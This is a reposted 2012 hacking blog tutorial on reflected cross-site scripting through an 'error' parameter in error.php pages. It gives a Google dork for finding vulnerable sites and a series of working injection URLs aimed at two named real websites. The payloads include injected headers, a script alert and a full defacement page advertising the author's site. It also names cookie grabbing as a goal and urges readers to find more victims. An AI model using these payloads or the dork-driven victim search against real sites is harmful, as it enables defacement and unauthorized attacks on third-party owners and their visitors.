error.php XSS (cross Site Scripting) Vulnerabilities

error.php XSS (cross Site Scripting) Vulnerabilities

Title : error.php XSS
Risk : Cross site scripting, cookie Grabbing
Poc : error.php?error=
Dork : “inurl:error.php?error=”
Author : Minhal Mehdi
browser : Mozilla Firefox 

Lets Start Goto Google, and say hello To Google ! 
now type the dork “inurl:error.php?error=”
in search results ignore all the extra results with diffrent url Like : error-php-error.php
pick site with url www.site.com/error.php?error= Only
Now Type your first Tag to Check the vulnerablity 
example : www.site.com/error.php?error=<h1>Test</h1>
if it will show you “Test” word in Header tag this Its Vulnerable
I got This website from Search results, so now see some examples :
To show Header 
http://www.sacareerfocus.co.za/error.php?error=<h1>Hacked</h1>
To show header in center
http://www.sacareerfocus.co.za/error.php?error=<center><h1>Hacked</h1></center>
to show Title
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title>
to Add a Image
http://www.sacareerfocus.co.za/error.php?error=<img src=”http://www.viruss.eu/wp-content/plugins/wp-o-matic/cache/3f8d6_cats.jpg”/>
to add a Message 
http://www.sacareerfocus.co.za/error.php?error=<p><b>Your Message Here<b></p>
to write message in next lines
http://www.sacareerfocus.co.za/error.php?error=<p><b>First line<br>Second Line <b></p> 
To add a scrolling Text
http://www.sacareerfocus.co.za/error.php?error=<marquee>Scrolling text Here</marquee>
To Add a alert box 
http://www.sacareerfocus.co.za/error.php?error=<script>alert(“hello”);</script>
To add background colour in page

http://www.sacareerfocus.co.za/error.php?error=<body bgcolor=”red”/>
to Add a full deface Page 

http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title><center><h1>hacked<h1><body bgcolor=”red”/><p><b>You have been Hacked<br></b></p><img src=”http://t0.gstatic.com/images?q=tbn:ANd9GcTN4uz2ifRTDefV_N7O2ZLEnyNfWb5TooIwqmZSwxOe_XH-8FksHA”/>
<marquee><b>www.devilscafe.in</b></marquee>


you can add more html and javscript tags here,
here is another demo site : 
http://europeanvaluepartneradvisors.com/error.php?error=<center><h1>www.devilscafe.in</h1></center>
find More website with dorks 🙂
please Leave a comment and share post to show your love For devilscafe !

 


 



Read more: error.php XSS (cross Site Scripting) Vulnerabilities

Incoming search terms

Story added 24. October 2012, content source with full text you can find at link above.